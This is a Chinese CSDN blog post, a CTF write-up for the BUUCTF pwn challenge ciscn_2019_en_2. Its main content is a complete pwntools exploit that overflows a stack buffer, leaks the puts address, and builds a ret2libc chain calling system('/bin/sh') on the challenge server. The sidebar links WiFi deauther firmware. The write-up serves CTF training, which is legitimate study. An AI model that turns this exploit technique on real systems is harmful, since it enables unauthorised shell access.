BUUCTF-PWN-ciscn_2019_en_2

最新推荐文章于 2023-05-08 17:08:55 发布
最新推荐文章于 2023-05-08 17:08:55 发布
阅读量249 收藏
点赞数
分类专栏: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Henlenl/article/details/116974736
版权
CTF 同时被 2 个专栏收录
28 篇文章 2 订阅
订阅专栏
pwn
7 篇文章 0 订阅
订阅专栏

文章目录

查看文件信息

amd 64位系统 NX保护
在这里插入图片描述

IDA 分析

nc 程序连接一下
在这里插入图片描述

没什么东西 给了几个选择的按钮

IDA 64分析一波
在这里插入图片描述
发现其实程序就只能选择1 而且关键函数是encrypt

我们进去看一下
在这里插入图片描述
所以 只要让 var[13] = 17就行了

exp

但是 这里要说明一下 32位程序是能直接去内存中寻址执行的
64位就是要依靠寄存器来寻址 然后找到地址返回给程序去执行的

from pwn import*
from LibcSearcher import*

r=remote('node3.buuoj.cn',25608)
elf=ELF('./ciscn_2019_en_2')

main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

r.sendlineafter('choice!\n','1')
payload='\0'+'a'*(0x50-1+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)

r.sendlineafter('encrypted\n',payload)
r.recvline()
r.recvline()

puts_addr=u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
offset=puts_addr-libc.dump('puts')
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')

r.sendlineafter('choice!\n','1')

payload='\0'+'a'*(0x50-1+8)
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)

r.sendlineafter('encrypted\n',payload)

r.interactive()
Persistent_s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 261
【CTF】BUUCTF-ciscn_2019_en_2 pwn
BUUCTF ciscn_2019_en_2
红叶的博客
10-28 521
对输入的字符串进行了加密,但是不知道为什么不需要绕过就能成功。使用gdb调试会被加密,因此使用IDA Pro查看变量大小。因为题目部署在Ubuntu18,因此需要栈平衡。
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 563
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
【CTF】ciscn_2019_en_2
凉水的博客
01-26 3759
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
ciscn_2019_en_2
m0sway的博客
03-25 1594
ciscn_2019_en_2 WriteUp BUU_PWN
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BUUCTF]ciscn_2019_en_2解题思路
ctfpwn的博客
05-08 277
接下来通过计算偏移和libcsearcher拿到libc版本从而泄露system和bin/sh然后栈溢出获得shell。先用ROPgadget --binary fliename --only 'pop|ret' 找找gadgets。通过读c伪代码可以看出先是一个嵌套循环,然后输入v4的值,根据v4值来执行下面的代码。其中的0x4009A0是用来泄露puts函数的地址后返回encrypt函数再次运行。希望思路对各位有所帮助(本人真的很菜),如有不足请各位佬们指点。很明显有个gets函数的栈溢出。
BUUCTF pwn——ciscn_2019_en_2
CNS-Enterprise BCC-1701-J
04-05 129
BUUCTF 做题练习
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1107
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值